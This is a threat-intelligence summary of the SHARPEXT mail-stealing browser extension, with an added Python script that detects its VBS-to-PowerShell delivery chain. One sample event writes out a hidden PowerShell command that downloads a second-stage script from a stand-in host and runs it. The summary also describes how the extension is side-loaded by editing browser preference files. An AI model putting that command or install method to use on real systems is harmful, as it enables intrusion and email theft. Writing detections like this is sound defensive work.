Volexity Identifies Malicious Browser Extension SHARPEXT
Industries: Defense, Government | Level: Tactical | Source: Volexity
SHARPEXT is a malicious browser extension, identified by Volexity, that steals mail data from the Microsoft Edge, Google Chrome, and Whale web browsers. Volexity attributes it to the North Korean threat actor it tracks as SharpTongue, whose activity overlaps with the group publicly known as Kimsuky: "Volexity frequently observes SharpTongue targeting and victimizing individuals working for organizations in the United States, Europe, and South Korea who work on topics involving North Korea, nuclear issues, weapons systems, and other matters of strategic interest to North Korea." Volexity has tracked the malware for over a year across multiple engagements, watching the attacker develop it from an early version into an effective data exfiltration tool: "Volexity's own visibility shows the extension has been quite successful, as logs obtained by Volexity show the attacker was able to successfully steal thousands of emails from multiple victims through the malware's deployment."

SHARPEXT is not delivered through a browser web store. Installation starts with a VBS script that downloads and executes a malicious PowerShell script; that script drops the extension and modifies the browser's Preferences and Secure Preferences files so the browser loads it, which means the attacker must already have access to the victim's system. Because the extension is enabled by editing those files rather than installed by the user, a store-based extension inventory will not show it; checking the endpoint's Secure Preferences file for unexpected extension entries will. Once loaded, SHARPEXT exfiltrates "data from a victim's webmail account as they browse it," so the theft happens inside a session the victim has already authenticated and produces no new logon for the mail provider to flag.
- VBS Script Downloads and Executes Malicious Payloads
Anvilogic Use Cases:
- Wscript/Cscript Execution
- Invoke-WebRequest Command
- Executable Create Script Process
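The three use cases above map onto the delivery chain described earlier (a user-launched VBS script runs under wscript.exe, which spawns PowerShell, which fetches the next stage with Invoke-WebRequest). The following is an added example, not Anvilogic's or Volexity's detection content: it implements the three rules as predicates over process-creation events and correlates them into a single chain alert. The event fields, the sample events, and the reading of "Executable Create Script Process" as "a process that is not itself a script interpreter spawns one" are assumptions made for the example.

```python
"""Detection logic for the SHARPEXT delivery chain: a VBS script run by
wscript.exe launches PowerShell, which downloads the next stage with
Invoke-WebRequest. Added example; not Volexity's or Anvilogic's code.
The event shape and all sample events below are constructed."""
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_INTERPRETERS = SCRIPT_HOSTS | {"powershell.exe", "pwsh.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Download cmdlets and their built-in aliases (iwr, irm).
WEB_REQUEST = re.compile(r"\b(invoke-webrequest|iwr|invoke-restmethod|irm)\b", re.I)


@dataclass
class ProcEvent:
    """Minimal process-creation record (assumed field set, e.g. from Sysmon EID 1)."""
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, tolerating forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_script_host_execution(ev: ProcEvent) -> bool:
    """Wscript/Cscript Execution: the created process is a Windows script host."""
    return basename(ev.image) in SCRIPT_HOSTS


def rule_invoke_webrequest(ev: ProcEvent) -> bool:
    """Invoke-WebRequest Command: PowerShell launched with a download cmdlet."""
    return basename(ev.image) in POWERSHELL and WEB_REQUEST.search(ev.command_line) is not None


def rule_executable_creates_script_process(ev: ProcEvent) -> bool:
    """Executable Create Script Process (assumed reading): a process that is not
    itself a script interpreter spawns one, e.g. explorer.exe -> wscript.exe."""
    return (basename(ev.image) in SCRIPT_INTERPRETERS
            and basename(ev.parent_image) not in SCRIPT_INTERPRETERS)


RULES = {
    "Wscript/Cscript Execution": rule_script_host_execution,
    "Invoke-WebRequest Command": rule_invoke_webrequest,
    "Executable Create Script Process": rule_executable_creates_script_process,
}


def evaluate(events):
    """Return (event_index, rule_name) for every rule that fires on every event."""
    return [(i, name) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]


def chain_alerts(events):
    """Correlate the use cases into one higher-confidence alert: a script host
    (wscript/cscript) spawned PowerShell that performs a web download. Returns
    the indices of the PowerShell events that complete the chain."""
    return [i for i, ev in enumerate(events)
            if basename(ev.parent_image) in SCRIPT_HOSTS and rule_invoke_webrequest(ev)]


# Constructed sample events: events 0 and 1 are the SHARPEXT-style chain,
# event 2 is benign scheduled PowerShell, event 3 is an ordinary browser launch.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\victim\AppData\Local\Temp\invoice.vbs"'),
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -c \"Invoke-WebRequest -Uri "
              "http://example.invalid/stage2.ps1 -OutFile $env:TEMP\\s.ps1; & $env:TEMP\\s.ps1\""),
    ProcEvent(r"C:\Windows\System32\services.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\inventory\collect.ps1"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Program Files\Google\Chrome\Application\chrome.exe", "chrome.exe"),
]

if __name__ == "__main__":
    for idx, name in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
    for idx in chain_alerts(SAMPLE_EVENTS):
        print(f"event {idx}: HIGH - script host spawned PowerShell download (SHARPEXT-style chain)")
```

Run stand-alone, the individual rules fire on the benign scheduled PowerShell too (event 2 trips "Executable Create Script Process"), which is why the chain correlation matters: only event 1, PowerShell spawned by wscript.exe with a download cmdlet, produces the high-confidence alert. Tuning belongs in the individual rules (parent allowlists, signed script paths), not in the chain logic.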